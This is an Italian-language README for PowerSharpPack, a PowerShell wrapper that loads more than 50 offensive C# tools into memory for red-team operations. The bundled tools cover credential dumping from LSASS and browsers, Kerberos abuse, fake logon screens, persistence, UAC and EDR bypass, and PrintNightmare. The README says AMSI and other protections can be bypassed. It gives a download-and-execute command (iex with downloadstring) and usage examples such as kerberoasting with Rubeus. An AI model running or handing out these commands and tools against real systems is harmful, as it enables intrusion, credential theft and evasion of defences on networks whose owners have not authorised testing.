
Wrapper PowerShell che raggruppa oltre 50 strumenti di sicurezza offensivi in C# per post-sfruttamento, elevazione dei privilegi, dumping delle credenziali, movimento laterale e ricognizione di Active Directory in operazioni di red team.
Molti progetti C# offensivi utili sono stati racchiusi in PowerShell per un facile utilizzo.
Perché? A mio parere personale, PowerShell offensivo non è morto a causa di AMSI, Script-block-logging, Constrained Language Mode o altre funzionalità di protezione. Ognuno di questi meccanismi può essere bypassato. Poiché la maggior parte dei nuovi progetti innovativi di sicurezza offensiva sono scritti in C#, ho deciso di renderli utilizzabili anche in PowerShell.
Quindi cosa ho fatto sostanzialmente?
[System.Reflection.Assembly]::Load($DecompressedDecodedBinary).È un processo molto semplice ma che richiede tempo per molti repository.
Quali strumenti sono inclusi?
Internalmonologue
Attacco Internal Monologue: Recupero di hash NTLM senza toccare LSASS
@Crediti a: https://github.com/eladshamir/Internal-Monologue
Seatbelt
Seatbelt è un progetto C# che esegue una serie di "controlli di sicurezza" orientati all'host, rilevanti sia dal punto di vista offensivo che difensivo.
@Crediti a: https://github.com/GhostPack/Seatbelt
SharpWeb
Progetto CLR .NET 2.0 per recuperare le credenziali salvate del browser da Google Chrome, Mozilla Firefox e Microsoft Internet Explorer/Edge.
@Crediti a: https://github.com/djhohnstein/SharpWeb
UrbanBishop
Crea una sezione RW locale in UrbanBishop e poi mappa quella sezione come RX in un processo remoto. Caricamento di shellcode reso facile.
@Crediti a: https://github.com/FuzzySecurity/Sharp-Suite
SharpUp
SharpUp è un porting C# di varie funzionalità di PowerUp.
@Crediti a: https://github.com/GhostPack/SharpUp
Rubeus
Rubeus è un set di strumenti C# per l'interazione grezza con Kerberos e i suoi abusi.
@Crediti a: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/
SharPersist
Toolkit di persistenza per Windows scritto in C#.
@Crediti a: https://github.com/fireeye/SharPersist
Sharpview
Implementazione C# di harmj0y's PowerView
@Crediti a: https://github.com/tevora-threat/SharpView
winPEAS
Controlla la checklist di escalation dei privilegi locali di Windows da book.hacktricks.xyz
@Crediti a: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless
Lockless permette la copia di file bloccati.
@Crediti a: https://github.com/GhostPack/Lockless
SharpChromium
Progetto CLR .NET 4.0 per recuperare dati di Chromium, come cookie, cronologia e login salvati.
@Crediti a: https://github.com/djhohnstein/SharpChromium
SharpDPAPI
SharpDPAPI è un porting C# di alcune funzionalità DPAPI di Mimikatz.
@Crediti a: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/
SharpShares
Enumera tutte le condivisioni di rete nel dominio corrente. Può anche risolvere i nomi in indirizzi IP.
@Crediti a: https://github.com/djhohnstein/SharpShares
SharpSniper
Trova utenti specifici in Active Directory tramite il loro nome utente e indirizzo IP di accesso
@Crediti a: https://github.com/HunnicCyber/SharpSniper
SharpSpray
SharpSpray è un semplice set di codice per eseguire un attacco di password spraying contro tutti gli utenti di un dominio utilizzando LDAP ed è compatibile con Cobalt Strike.
@Crediti a: https://github.com/jnqpblc/SharpSpray
Watson
Enumera i KB mancanti e suggerisce exploit per vulnerabilità di escalation dei privilegi utili
@Crediti a: https://github.com/rasta-mouse/Watson
Grouper2
Trova vulnerabilità nei Criteri di gruppo di Active Directory
@Crediti a: https://github.com/l0ss/Grouper2
Tokenvator
Uno strumento per elevare i privilegi con i token di Windows
@Crediti a: https://github.com/0xbadjuju/Tokenvator
SauronEye
Strumento di ricerca per trovare file specifici contenenti parole specifiche, ad esempio file contenenti password.
@Crediti a: https://github.com/vivami/SauronEye
Basta caricare lo script principale con
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
e scegliere lo strumento come parametro switch, ad esempio:
PowerSharpPack -seatbelt -Command "AMSIProviders"
Se si desidera passare più parametri al binario, è sufficiente usare le virgolette come:
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
Se non si desidera caricare tutti i binari per vari motivi, è possibile utilizzare gli script PowerShell per singolo binario situati nella cartella PowerSharpBinaries.
Progetti disponibili anche come script PowerShell autonomo:
SharpCloud
Semplice C# per verificare l'esistenza di file di credenziali relativi ad AWS, Microsoft Azure e Google Compute.
@Crediti a: https://github.com/chrismaddalena/SharpCloud
SharpSSDP
SSDP Service Discovery
@Crediti a: https://github.com/rvrsh3ll/SharpSSDP
DAFT
DAFT: Database Audit Framework & Toolkit
@Crediti a: https://github.com/NetSPI/DAFT
Get-RBCD-Threaded
Strumento per scoprire percorsi di attacco di Constrained Delegation basati su risorse in ambienti Active Directory
@Crediti a: https://github.com/FatRodzianko/Get-RBCD-Threaded
SharpGPO-RemoteAccessPolicies
Uno strumento C# per enumerare le politiche di accesso remoto tramite i criteri di gruppo.
@Crediti a: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
SharpAllowedToAct
Acquisizione di oggetti computer tramite Constrained Delegation basata su risorse (msDS-AllowedToActOnBehalfOfOtherIdentity)
@Crediti a: https://github.com/pkb1s/SharpAllowedToAct
WireTap
Progetto .NET 4.0 per interagire con hardware video, audio e tastiera.
@Crediti a: https://github.com/djhohnstein/WireTap
SharpClipboard
Monitoraggio degli Appunti in C#
@Crediti a: https://github.com/slyd0g/SharpClipboard
SharpPrinter
Scopri stampanti + verifica vulnerabilità
@Crediti a: https://github.com/rvrsh3ll/SharpPrinter
SharpHide
Strumento per creare chiavi di registro nascoste.
@Crediti a: https://github.com/outflanknl/SharpHide
SpoolSample
Strumento PoC per costringere host Windows ad autenticarsi su altre macchine tramite l'interfaccia RPC MS-RPRN. Ciò è possibile anche tramite altri protocolli.
@Crediti a: https://github.com/leechristensen/SpoolSample
SharpGPOAbuse
SharpGPOAbuse è un'applicazione .NET scritta in C# che può essere utilizzata per sfruttare i diritti di modifica di un utente su un Oggetto Criterio di Gruppo (GPO) al fine di compromettere gli oggetti controllati da quel GPO.
@Crediti a: https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump
SharpDump è un porting C# della funzionalità Out-Minidump.ps1 di PowerSploit.
@Crediti a: https://github.com/GhostPack/SharpDump
SharpHound3
Raccolta dati C# per il progetto BloodHound, Versione 3
@Crediti a: https://github.com/BloodHoundAD/SharpHound3
PostDump
Un altro strumento per eseguire il minidump del processo LSASS utilizzando poche tecniche per evitare il rilevamento.
@Crediti a: https://github.com/YOLOP0wn/POSTDump
SharpLocker
SharpLocker aiuta a ottenere le credenziali dell'utente corrente mostrando una falsa schermata di blocco di Windows, tutto l'output viene inviato alla Console, perfetto per Cobalt Strike.
@Crediti a: https://github.com/Pickfordmatt/SharpLocker
Eyewitness
EyeWitness è progettato per fare screenshot di siti web, fornire alcune informazioni header del server e identificare credenziali predefinite se possibile.
@Crediti a: https://github.com/FortyNorthSecurity/EyeWitness
FakeLogonScreen
Falsa schermata di accesso di Windows per rubare password
@Crediti a: https://github.com/bitsadmin/fakelogonscreen
P0wnedShell
Toolkit di post-exploitation per PowerShell Runspace
@Crediti a: https://github.com/Cn33liz/p0wnedShell
Safetykatz
SafetyKatz è una combinazione di una versione leggermente modificata del progetto Mimikatz di @gentilkiwi e del .NET PE Loader di @subTee L'ho modificato di nuovo con la mia versione offuscata di Mimikatz.
@Crediti a: https://github.com/GhostPack/SafetyKatz
InveighZero
Strumento Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 spoofing/man-in-the-middle .
@Crediti a: https://github.com/Kevin-Robertson/InveighZero
SharpSploit
SharpSploit è una libreria .NET di post-exploitation scritta in C#.
@Crediti a: https://github.com/cobbr/SharpSploit
Snaffler
Uno strumento per penetration tester per aiutare a trovare "dolci" interessanti, di @l0ss e @Sh3r4 ( Twitter: @/mikeloss e @/sh3r4_hax ).
@Crediti a: https://github.com/SnaffCon/Snaffler
BadPotato
itm4ns Printspoofer in C#.
@Crediti a: https://github.com/BeichenDream/BadPotato
BetterSafetyKatz
Fork di SafetyKatz che recupera dinamicamente l'ultima versione precompilata di Mimikatz direttamente dal repository GitHub di gentilkiwi, applica patch runtime alle firme e utilizza SharpSploit DInvoke per caricare in memoria tramite PE-Load.
@Crediti a: https://github.com/Flangvik/BetterSafetyKatz
SharpKatz
Porting C# dei comandi sekurlsa::logonpasswords, sekurlsa::ekeys e lsadump::dcsync di mimikatz.
@Crediti a: https://github.com/b4rtik/SharpKatz
Gopher
Strumento C# per scoprire frutti a bassa pendenza.
@Crediti a: https://github.com/EncodeGroup/Gopher
SharpOxidResolver
IOXIDResolver da AirBus Security/PingCastle.
@Crediti a: https://github.com/vletoux/pingcastle/
SharpBlock
Un metodo per bypassare le DLL di proiezione attiva degli EDR impedendo l'esecuzione del punto di ingresso.
@Crediti a: https://github.com/CCob/SharpBlock
SharpLoginPrompt
Questo programma crea un prompt di accesso per raccogliere nome utente e password dell'utente corrente. Questo progetto consente ai red team di phishare nome utente e password dell'utente corrente senza toccare lsass e senza avere credenziali di amministratore sul sistema.
@Crediti a: https://github.com/shantanu561993/SharpLoginPrompt
ThunderFox
Recupera dati (contatti, email, cronologia, cookie e credenziali) da Thunderbird e Firefox.
@Crediti a: https://github.com/V1V1/SharpScribbles
StickyNotesExtract
Estrae dati dal database delle Note Appiccicose di Windows. Funziona su Windows 10 Build 1607 e successive. Questo progetto non dipende da dipendenze esterne.
@Crediti a: https://github.com/V1V1/SharpScribbles
SCShell
Strumento di movimento laterale senza file che si basa su ChangeServiceConfigA per eseguire comandi.
@Crediti a: https://github.com/Mr-Un1k0d3r/SCShell
SharpSecDump
Porting .Net della funzionalità di dump remoto di SAM + LSA Secrets di impacket's secretsdump.py.
@Crediti a: https://github.com/G0ldenGunSec/SharpSecDump
SharpHandler
Questo progetto riutilizza handle aperti a lsass per analizzare o eseguire minidump di lsass, quindi non è necessario utilizzare il proprio handle di lsass per interagire con esso.
@Crediti a: https://github.com/jfmaes/SharpHandler
SharpRDP
Applicazione Console .NET per il protocollo Remote Desktop per l'esecuzione di comandi autenticati.
@Crediti a: https://github.com/0xthirteen/SharpRDP
SharpMove
Progetto .NET per l'esecuzione remota autenticata.
@Crediti a: https://github.com/0xthirteen/SharpMove
SharpStay
Progetto .NET per installare la persistenza
@Crediti a: https://github.com/0xthirteen/SharpStay
SharpPrintNightmare
Implementazione C# di PrintNightmare CVE-2021-1675/CVE-2021-34527
@Crediti a: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare
Certify
Abuso di certificati Active Directory.
@Crediti a: https://github.com/GhostPack/Certify
Farmer
Farmer è un progetto per raccogliere hash NetNTLM in un dominio Windows. Farmer ottiene questo risultato creando un server WebDAV locale che causa l'autenticazione del Mini Redirector WebDAV da qualsiasi client che si connette.
@Crediti a: https://github.com/mdsecactivebreach/Farmer
SharpBypassUAC
Strumento C# per bypass UAC
@Crediti a: https://github.com/FatRodzianko/SharpBypassUAC
StandIn
StandIn è un piccolo toolkit di post-exploitation per AD .NET35/45
@Crediti a: https://github.com/FuzzySecurity/StandIn
Carbuncle
Strumento per interagire con l'interop di Outlook durante impegni di red team
@Crediti a: https://github.com/checkymander/Carbuncle
Whisker
Whisker è uno strumento C# per prendere il controllo di account utente e computer di Active Directory manipolando il loro attributo msDS-KeyCredentialLink, aggiungendo di fatto "Shadow Credentials" all'account target.
@Crediti a: https://github.com/eladshamir/Whisker
SharpLdapRelayScan
Porting C# di LdapRelayScan
@Crediti a: https://github.com/klezVirus/SharpLdapRelayScan
LdapSignCheck
Progetto C# per verificare la firma LDAP.
@Crediti a: https://github.com/cube0x0/LdapSignCheck
SharpImpersonation
SharpImpersonation - Uno strumento di impersonificazione utente - tramite Token o iniezione di Shellcode.
@Crediti a: https://github.com/S3cur3Th1sSh1t/SharpImpersonation
SharpWSUS
SharpWSUS è uno strumento CSharp per il movimento laterale tramite WSUS. C'è un blog corrispondente (https://labs.nettitude.com/blog/introducing-sharpwsus/) che ha informazioni più dettagliate sullo strumento, l'uso e il rilevamento.
@Crediti a: https://github.com/nettitude/SharpWSUS
MalSCCM
Questo strumento permette di abusare di server SCCM locali o remoti per distribuire applicazioni dannose agli host che gestiscono. Per utilizzare questo strumento, il tuo processo corrente deve avere diritti di amministrazione sul server SCCM. Tipicamente le distribuzioni di SCCM avranno il server di gestione e il server primario sullo stesso host, nel qual caso l'host restituito dal comando locate può essere utilizzato come server primario.
@Crediti a: https://github.com/nettitude/MalSCCM
KrbRelay
Framework per il relaying Kerberos
@Crediti a: https://github.com/cube0x0/KrbRelay
SharpSCCM
Un'utilità C# per interagire con SCCM
@Credito: https://github.com/Mayyhem/SharpSCCM
ShadowSpray
Uno strumento per spruzzare Shadow Credentials su un intero dominio nella speranza di abusare di DACL GenericWrite/GenericAll dimenticate su altri oggetti nel dominio.
@Credito: https://github.com/Dec0ne/ShadowSpray
Grouper3
Trova vulnerabilità nei Criteri di gruppo di Active Directory, ma fallo meglio di Grouper2.
@Crediti a: https://github.com/Group3r/Group3r
HandleKatz
Dumper PIC di lsass utilizzando handle clonati
@Crediti a: https://github.com/codewhitesec/HandleKatz
NanoDump
Scarica LSASS come si deve
@Crediti a: https://github.com/helpsystems/nanodump
PPLDump
Scarica la memoria di un PPL con un exploit in userland
@Crediti a: https://github.com/itm4n/PPLdump